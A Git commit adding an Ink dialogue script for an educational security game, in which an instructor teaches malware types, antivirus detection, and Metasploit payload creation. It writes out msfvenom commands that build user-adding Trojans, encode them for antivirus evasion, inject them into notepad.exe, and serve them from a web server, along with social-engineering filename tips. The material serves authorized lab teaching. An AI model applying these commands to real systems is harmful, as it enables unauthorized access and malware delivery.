cybersecurity/BreakEscape
1
0
Fork 0
mirror of https://github.com/cliffe/BreakEscape.git synced 2026-02-21 11:18:08 +00:00
Code Issues Packages Projects Releases Wiki Activity

feat: Add GBL malware and Metasploit Framework lab sheet

Browse Source
This commit is contained in:
Z. Cliffe Schreuders
2025-11-19 18:24:26 +00:00
parent 6d271e1350
commit fbcc23b375
1 changed files with 654 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

654
story_design/ink/lab_sheets/malware_metasploit.ink Normal file
View File

@@ -0,0 +1,654 @@
// ===========================================
// MALWARE AND METASPLOIT LAB
// Introduction to Malware and Payloads
// ===========================================
// Game-Based Learning replacement for lab sheet
// Original: introducing_attacks/2_malware_msf_payloads.md
// ===========================================
// Global persistent state
VAR instructor_rapport = 0
VAR ethical_awareness = 0
// External variables
EXTERNAL player_name
// ===========================================
// ENTRY POINT
// ===========================================
=== start ===
Malware Specialist: Welcome to Malware Analysis and Metasploit Fundamentals, Agent {player_name}.
Malware Specialist: This lab covers malicious software - what it is, how it works, and how to create and analyze it in controlled environments.
Malware Specialist: Before we begin, ethical boundaries reminder: everything we cover is for authorized penetration testing and security research. Creating or deploying malware against systems you don't have explicit permission to test is illegal.
* [Understood - authorized testing only]
~ ethical_awareness += 15
You: Clear. Authorized environments, defensive purpose, professional responsibility.
Malware Specialist: Excellent. Let's proceed.
-> malware_hub
* [I understand the constraints]
~ ethical_awareness += 5
You: I understand the ethical boundaries.
Malware Specialist: Good. Keep that in mind throughout.
-> malware_hub
// ===========================================
// MAIN HUB
// ===========================================
=== malware_hub ===
Malware Specialist: What aspect of malware and Metasploit would you like to explore?
+ [Types of malware and classifications]
-> malware_types
+ [Introduction to Metasploit Framework]
-> metasploit_intro
+ [Creating payloads with msfvenom]
-> msfvenom_basics
+ [Anti-malware detection methods]
-> antimalware_detection
+ [Evasion techniques and polymorphic malware]
-> evasion_techniques
+ [Remote Access Trojans (RATs)]
-> rat_intro
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> END
// ===========================================
// MALWARE TYPES
// ===========================================
=== malware_types ===
~ instructor_rapport += 5
Malware Specialist: Malware - malicious software. Programs designed to carry out harmful actions.
Malware Specialist: Microsoft's old TechNet essay put it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore."
Malware Specialist: That's the core threat. A program running on your system has access to everything you have access to. If it runs as admin/root, even worse.
* [What are the main types?]
You: How is malware classified?
-> malware_taxonomy
* [Why target Windows most?]
You: Why is Windows the primary target?
Malware Specialist: Market share. Windows dominates desktop OS usage. More targets means more potential victims.
Malware Specialist: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is shifting the landscape.
Malware Specialist: Also, each Windows version adds security mitigations. We test on Windows 7 in labs because its mitigations are well-understood and bypassable for learning purposes.
~ instructor_rapport += 5
-> malware_types
* [Understood]
-> malware_hub
=== malware_taxonomy ===
~ instructor_rapport += 8
Malware Specialist: Main classifications:
Malware Specialist: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. A "game" that's actually a backdoor.
- Doesn't self-propagate
- May provide remote access (RAT - Remote Access Trojan)
- May spy on users (spyware, keyloggers)
- May force advertising (adware)
Malware Specialist: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors.
Malware Specialist: **Worms** - automatically spread to other computers on the network. Self-propagating across systems via exploits, email, etc.
Malware Specialist: **Rootkits** - hide the presence of infection. Manipulate OS to conceal malicious processes, files, network connections.
Malware Specialist: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining.
Malware Specialist: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity.
* [Tell me more about Trojans]
You: Trojans seem most relevant to this lab?
Malware Specialist: Correct. We'll focus on creating Trojan horses - programs that appear innocent but perform malicious actions.
Malware Specialist: Social engineering is key. Convince victim to run it. No exploitation required if they willingly execute it.
~ instructor_rapport += 8
-> malware_hub
* [How do these overlap?]
You: Can malware be multiple types?
Malware Specialist: Absolutely. A Trojan worm that installs a rootkit, for example.
Malware Specialist: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities.
Malware Specialist: Taxonomy helps us discuss and categorize, but real malware can be complex, multi-functional.
~ instructor_rapport += 10
-> malware_hub
* [Got it]
-> malware_hub
// ===========================================
// METASPLOIT FRAMEWORK
// ===========================================
=== metasploit_intro ===
~ instructor_rapport += 5
Malware Specialist: Metasploit Framework - one of the most powerful penetration testing tools available.
Malware Specialist: Contains extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools. Framework for developing custom exploits.
Malware Specialist: Open source, maintained by Rapid7. Free framework version (what we use) and commercial Pro version with GUI.
Malware Specialist: We're using command-line tools - teaches you more about concepts and mechanics.
* [What can Metasploit do?]
You: What's the scope of Metasploit's capabilities?
Malware Specialist: Enormous scope:
- Exploit development and execution
- Payload generation (what we're focusing on)
- Post-exploitation (once you've compromised a system)
- Auxiliary modules (scanners, sniffers, fuzzers)
- Evasion and anti-forensics
~ instructor_rapport += 8
-> metasploit_intro
* [Why is it legal to distribute?]
You: How is this legal if it creates malware?
~ ethical_awareness += 10
Malware Specialist: Excellent question. Shows good critical thinking.
Malware Specialist: Metasploit is a *tool*. Hammer can build houses or break windows. The tool isn't illegal - misuse is.
Malware Specialist: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises.
Malware Specialist: It's widely used by security professionals to identify weaknesses before attackers do.
~ instructor_rapport += 15
-> metasploit_intro
* [Tell me about payloads]
You: What exactly is a payload?
-> payload_explanation
* [Back to main menu]
-> malware_hub
=== payload_explanation ===
~ instructor_rapport += 8
Malware Specialist: Payload - the malicious code you want to execute on a victim's system.
Malware Specialist: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access.
Malware Specialist: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access.
Malware Specialist: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code.
* [How do I see available payloads?]
You: How many payloads exist?
Malware Specialist: `msfvenom -l payloads | less` lists them all. Hundreds.
Malware Specialist: Platform-specific: windows, linux, osx, android, etc.
Malware Specialist: Various functions: shells, meterpreter, exec commands, VNC, etc.
Malware Specialist: Each has configurable options for IP addresses, ports, usernames, etc.
~ instructor_rapport += 5
-> payload_explanation
* [What's the simplest payload?]
You: What's a basic example?
Malware Specialist: `windows/adduser` - simply adds a user account to Windows.
Malware Specialist: Configuration: USER= (username), PASS= (password)
Malware Specialist: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe`
Malware Specialist: Victim runs trojan.exe, new admin account created. Simple, effective Trojan.
~ instructor_rapport += 5
-> payload_explanation
* [Understood]
-> metasploit_intro
// ===========================================
// MSFVENOM BASICS
// ===========================================
=== msfvenom_basics ===
~ instructor_rapport += 5
Malware Specialist: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality.
Malware Specialist: Generates standalone payloads in various formats: executables, shellcode, scripts, etc.
Malware Specialist: Basic workflow:
1. Choose payload
2. Configure options
3. Select output format
4. Generate file
* [Walk me through creating a Trojan]
You: Show me the complete process.
-> trojan_creation_walkthrough
* [What output formats exist?]
You: What formats can msfvenom generate?
Malware Specialist: `msfvenom -l formats` lists them all.
Malware Specialist: Common formats:
- exe: Windows executable
- elf: Linux executable
- dll: Windows library
- python, ruby, perl: Scripts in various languages
- c, java: Source code
- raw: Raw shellcode
Malware Specialist: Choose format based on target platform and delivery method.
~ instructor_rapport += 8
-> msfvenom_basics
* [How do I configure payloads?]
You: What about payload options?
Malware Specialist: `msfvenom -p payload_name --list-options` shows available options.
Malware Specialist: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc.
Malware Specialist: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123`
~ instructor_rapport += 5
-> msfvenom_basics
* [Back to main menu]
-> malware_hub
=== trojan_creation_walkthrough ===
~ instructor_rapport += 10
Malware Specialist: Complete Trojan creation example:
Malware Specialist: **Step 1:** Choose payload
`msfvenom -l payloads | grep windows/adduser`
Malware Specialist: **Step 2:** Check options
`msfvenom -p windows/adduser --list-options`
Malware Specialist: **Step 3:** Generate executable
`msfvenom -p windows/adduser USER=backdoor PASS=SecurePass123 -f exe > game.exe`
Malware Specialist: **Step 4:** Deliver to victim (in lab: web server)
`sudo cp game.exe /var/www/html/share/`
`sudo service apache2 start`
Malware Specialist: **Step 5:** Victim downloads and runs game.exe
(Social engineering: "Free game! Click to play!")
Malware Specialist: **Step 6:** Verify success
On victim system: `net user` shows new backdoor account
Malware Specialist: That's the basic flow. Simple but effective if victim trusts you enough to run the file.
* [How do I make it less suspicious?]
You: How do I make it seem legitimate?
Malware Specialist: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality.
Malware Specialist: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality.
~ instructor_rapport += 10
-> msfvenom_basics
* [What about detection?]
You: Won't anti-malware catch this?
Malware Specialist: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware.
Malware Specialist: That's why we need evasion techniques - encoding, obfuscation, template injection.
-> antimalware_detection
* [Clear walkthrough]
-> msfvenom_basics
// ===========================================
// ANTI-MALWARE DETECTION
// ===========================================
=== antimalware_detection ===
~ instructor_rapport += 5
Malware Specialist: Anti-malware software - defensive tools attempting to detect and block malicious software.
Malware Specialist: Two main detection approaches: signature-based and anomaly-based.
* [Explain signature-based detection]
You: How does signature-based detection work?
-> signature_based
* [Explain anomaly-based detection]
You: How does anomaly-based detection work?
-> anomaly_based
* [How do I test against anti-malware?]
You: How can I test my payloads?
Malware Specialist: ClamAV - open-source anti-malware scanner.
Malware Specialist: `clamscan` scans current directory for malware.
Malware Specialist: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked.
Malware Specialist: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security.
~ instructor_rapport += 8
-> antimalware_detection
* [Back to main menu]
-> malware_hub
=== signature_based ===
~ instructor_rapport += 8
Malware Specialist: Signature-based detection - blacklist of known malware patterns.
Malware Specialist: **How it works:**
- Malware researchers analyze malicious code
- Extract unique signatures (byte patterns, hashes, code structures)
- Add to signature database
- Scanner compares files against database
Malware Specialist: **Advantages:**
- High accuracy for known threats
- Low false positive rate
- Resource efficient
- Mature, well-understood technology
Malware Specialist: **Disadvantages:**
- Useless against unknown malware (zero-days)
- Requires constant signature updates
- Polymorphic malware can evade (same function, different code)
- Always reactive, never proactive
* [How do hashes relate to signatures?]
~ instructor_rapport += 10
You: You mentioned hashes earlier?
Malware Specialist: Simple signature approach: hash the entire malware file.
Malware Specialist: `sha256sum malware.exe` produces unique fingerprint.
Malware Specialist: Change one byte? Completely different hash. That's the evasion opportunity.
Malware Specialist: Re-encode payload → different file → different hash → evades hash-based detection.
Malware Specialist: Modern scanners use more sophisticated signatures than simple hashes, but principle remains.
~ instructor_rapport += 10
-> signature_based
* [Understood]
-> antimalware_detection
=== anomaly_based ===
~ instructor_rapport += 8
Malware Specialist: Anomaly-based detection - identifies malicious behavior rather than known signatures.
Malware Specialist: **How it works:**
- Establish baseline of normal system behavior
- Monitor processes, registry changes, network connections, file access
- Flag deviations from normal as potentially malicious
- May use machine learning, heuristics, behavioral analysis
Malware Specialist: **Advantages:**
- Detects unknown threats (zero-days)
- Adapts to new attack methods
- More comprehensive than signature matching
- Less dependent on frequent updates
Malware Specialist: **Disadvantages:**
- False positives (legitimate software flagged)
- Complex implementation and tuning
- Resource intensive (continuous monitoring)
- Difficult to establish baseline (what's "normal"?)
* [Give me an example]
You: What behaviors trigger anomaly detection?
Malware Specialist: Suspicious patterns:
- Process creating multiple network connections
- Modification of system files
- Injection into other processes
- Encryption of large numbers of files (ransomware behavior)
- Keylogging-like keyboard hooks
- Persistence mechanisms (registry keys, startup folders)
Malware Specialist: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly.
~ instructor_rapport += 10
-> anomaly_based
* [Which is better?]
You: Which detection method is superior?
Malware Specialist: Both. Modern anti-malware uses layered approach.
Malware Specialist: Signature-based catches known threats efficiently. Anomaly-based catches unknowns.
Malware Specialist: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth.
Malware Specialist: No single method is perfect. Combine multiple for better coverage.
~ instructor_rapport += 10
-> anomaly_based
* [Got it]
-> antimalware_detection
// ===========================================
// EVASION TECHNIQUES
// ===========================================
=== evasion_techniques ===
~ instructor_rapport += 5
Malware Specialist: Evasion - making malware undetectable to anti-malware scanners.
Malware Specialist: Key techniques: encoding, obfuscation, template injection, packing, encryption.
Malware Specialist: Goal: change how malware looks without changing what it does.
* [Explain encoding]
You: How does encoding help evasion?
-> encoding_evasion
* [Explain template injection]
You: What's template injection?
-> template_injection
* [What's polymorphic malware?]
You: You mentioned polymorphic malware earlier?
Malware Specialist: Polymorphic malware - changes its appearance while maintaining functionality.
Malware Specialist: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime.
Malware Specialist: Each iteration looks different (different encoding, different decryptor), but does the same thing.
Malware Specialist: This is what msfvenom encoders create - polymorphic payloads.
~ instructor_rapport += 10
-> evasion_techniques
* [Back to main menu]
-> malware_hub
=== encoding_evasion ===
~ instructor_rapport += 10
Malware Specialist: Encoding for evasion - re-encode payload so file looks different but executes identically.
Malware Specialist: msfvenom supports multiple encoders. View list: `msfvenom -l encoders`
Malware Specialist: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder)
Malware Specialist: Usage:
`msfvenom -p windows/adduser USER=test PASS=pass123 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe`
Malware Specialist: `-e` specifies encoder, `-i` specifies iterations (encode 10 times)
* [Does more encoding help?]
You: Is 10 iterations better than 1?
Malware Specialist: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures.
Malware Specialist: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis.
Malware Specialist: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective.
~ instructor_rapport += 8
-> encoding_evasion
* [Can I chain encoders?]
You: Can I use multiple different encoders?
Malware Specialist: Absolutely. Pipe msfvenom outputs:
`msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe`
Malware Specialist: Each encoder transforms output differently. Chaining increases obfuscation.
Malware Specialist: Though again, modern AV looks deeper than surface encoding.
~ instructor_rapport += 10
-> encoding_evasion
* [Understood]
-> evasion_techniques
=== template_injection ===
~ instructor_rapport += 10
Malware Specialist: Template injection - embedding payload inside legitimate executable.
Malware Specialist: Makes malware look like real software. Both malicious code AND original program execute.
Malware Specialist: msfvenom `-x` flag specifies template executable:
`msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe`
Malware Specialist: Result: executable that opens Notepad (seems normal) while also adding user account (malicious).
* [Why is this effective?]
You: How does this evade detection?
Malware Specialist: Several reasons:
- File structure resembles legitimate program
- Contains real code from original program
- Signature scanners see legitimate program signatures too
- Behavioral analysis sees expected behavior (Notepad opens) alongside malicious
Malware Specialist: Not perfect, but more effective than bare encoded payload.
~ instructor_rapport += 10
-> template_injection
* [What programs make good templates?]
You: Which programs should I use as templates?
Malware Specialist: Context-dependent. Match victim's expectations:
- Games for game-focused social engineering
- Utilities (calc.exe, notepad.exe) for general purpose
- Industry-specific software for targeted attacks
Malware Specialist: Smaller files better (less suspicious download size).
Malware Specialist: Legitimate signed programs add credibility.
~ instructor_rapport += 8
-> template_injection
* [Can I combine encoding and templates?]
You: Can I use both techniques together?
Malware Specialist: Absolutely recommended. Encode first, then inject into template:
`msfvenom -p payload -e encoder -i 7 | msfvenom -x template.exe -f exe > output.exe`
Malware Specialist: Layered evasion: encoding changes signature, template adds legitimacy.
Malware Specialist: In practice: well-encoded, template-injected payloads evade many scanners.
~ instructor_rapport += 10
-> template_injection
* [Got it]
-> evasion_techniques
// ===========================================
// REMOTE ACCESS TROJANS
// ===========================================
=== rat_intro ===
~ instructor_rapport += 5
Malware Specialist: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system.
Malware Specialist: Classic architecture: client-server model.
- Server (victim runs this): listens for connections, executes commands
- Client (attacker uses this): connects to server, sends commands
Malware Specialist: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation.
* [How do RATs differ from what we've done?]
You: How is this different from adduser payload?
Malware Specialist: adduser is single-action. Runs once, adds user, exits.
Malware Specialist: RAT provides persistent, interactive access. Attacker can issue multiple commands over time.
Malware Specialist: More powerful, more flexible, more risk if detected.
~ instructor_rapport += 8
-> rat_intro
* [What Metasploit payloads create RATs?]
You: Which payloads provide remote access?
Malware Specialist: Several options:
- windows/meterpreter/reverse_tcp - full-featured RAT
- windows/shell/reverse_tcp - simple command shell
- windows/vnc/reverse_tcp - graphical remote access
Malware Specialist: Meterpreter is most powerful - extensive post-exploitation features.
Malware Specialist: Reverse shells covered in later labs. Advanced topic.
~ instructor_rapport += 8
-> rat_intro
* [Why "reverse"?]
You: What does "reverse" mean in reverse_tcp?
Malware Specialist: Normal: attacker connects TO victim (requires open port on victim, often firewalled).
Malware Specialist: Reverse: victim connects TO attacker (outbound connections usually allowed).
Malware Specialist: Victim initiates connection, attacker listens. Bypasses most firewalls.
Malware Specialist: Essential technique for real-world scenarios where victims are behind NAT/firewalls.
~ instructor_rapport += 10
-> rat_intro
* [Understood]
-> malware_hub
// ===========================================
// COMMANDS REFERENCE
// ===========================================
=== commands_reference ===
Malware Specialist: Quick reference for Metasploit and malware-related commands:
Malware Specialist: **msfvenom basics:**
- List payloads: `msfvenom -l payloads`
- List encoders: `msfvenom -l encoders`
- List formats: `msfvenom -l formats`
- Show options: `msfvenom -p payload_name --list-options`
Malware Specialist: **Creating payloads:**
- Basic: `msfvenom -p windows/adduser USER=name PASS=pass -f exe > trojan.exe`
- Encoded: `msfvenom -p payload -e x86/shikata_ga_nai -i 10 -f exe > output.exe`
- With template: `msfvenom -p payload -x template.exe -f exe > output.exe`
- Combined: `msfvenom -p payload -e encoder -i 5 | msfvenom -x template.exe -f exe > final.exe`
Malware Specialist: **Testing payloads:**
- Hash file: `sha256sum filename.exe`
- Scan with ClamAV: `clamscan`
- Scan specific file: `clamscan filename.exe`
Malware Specialist: **Web server (payload delivery):**
- Create share directory: `sudo mkdir /var/www/html/share`
- Copy payload: `sudo cp malware.exe /var/www/html/share/`
- Start Apache: `sudo service apache2 start`
- Access from victim: http://KALI_IP/share/malware.exe
Malware Specialist: **Windows victim verification:**
- List users: `net user`
- Check specific user: `net user username`
+ [Back to main menu]
-> malware_hub
// ===========================================
// CHALLENGE TIPS
// ===========================================
=== challenge_tips ===
Malware Specialist: Practical tips for lab challenges:
Malware Specialist: **Creating effective Trojans:**
- Start simple (windows/adduser or windows/exec)
- Test unencoded version first to ensure payload works
- Then add encoding, check if detection increases
- Finally try template injection for best evasion
Malware Specialist: **Evasion tips:**
- Experiment with different encoders and iteration counts
- Shikata_ga_nai is popular but widely signatured - try others
- Chain multiple encoders for better results
- Use legitimate programs as templates (notepad, calc, small utilities)
- Test against ClamAV before trying against victim
- Don't upload to VirusTotal if you want evasion to last (shares sample with AV vendors)
Malware Specialist: **Delivery tips:**
- Make filename convincing (game.exe, important_document.exe, update.exe)
- Social engineering matters - victim needs reason to run it
- In real scenarios: icons, file properties, code signing all add legitimacy
- For lab: simple web delivery works fine
Malware Specialist: **Verification:**
- Windows: `net user` shows created accounts
- Check Admin group: `net localgroup administrators`
- If payload fails, check syntax and password complexity requirements
- Passwords need: uppercase, lowercase, numbers (e.g., SecurePass123)
Malware Specialist: **Troubleshooting:**
- Payload doesn't work? Test simpler version without encoding
- Still detected by AV? Try different template or more encoding iterations
- Apache won't start? `sudo service apache2 status` for error info
- Can't download from Kali? Check IP address (`ip a`) and firewall rules
{instructor_rapport >= 50:
Malware Specialist: You've engaged deeply with the material and asked excellent questions. You're well-prepared for the practical exercises.
}
+ [Back to main menu]
-> malware_hub
// ===========================================
// READY FOR PRACTICE
// ===========================================
=== ready_for_practice ===
Malware Specialist: Good. You've covered the core concepts.
Malware Specialist: Lab objectives:
1. Create basic Trojan using msfvenom
2. Test against anti-malware (ClamAV)
3. Use encoding to evade detection
4. Inject payload into legitimate program template
5. Deliver via web server to Windows victim
6. Verify successful exploitation
{ethical_awareness >= 10:
Malware Specialist: You've demonstrated solid ethical awareness. Remember: controlled lab environment, authorized testing only.
}
Malware Specialist: The skills you're learning are powerful. Metasploit is used by professional penetration testers worldwide.
Malware Specialist: But also by criminals. The difference is authorization and intent.
Malware Specialist: You're learning these techniques to defend against them - to understand attacker methods, test organizational defenses, and improve security posture.
Malware Specialist: One final reminder: creating or deploying malware against unauthorized systems is computer fraud. Felony-level crime. Only use these skills in authorized contexts: penetration testing contracts, security research, education labs, your own isolated systems.
Malware Specialist: Now go create some Trojans. Good luck, Agent {player_name}.
#exit_conversation
-> END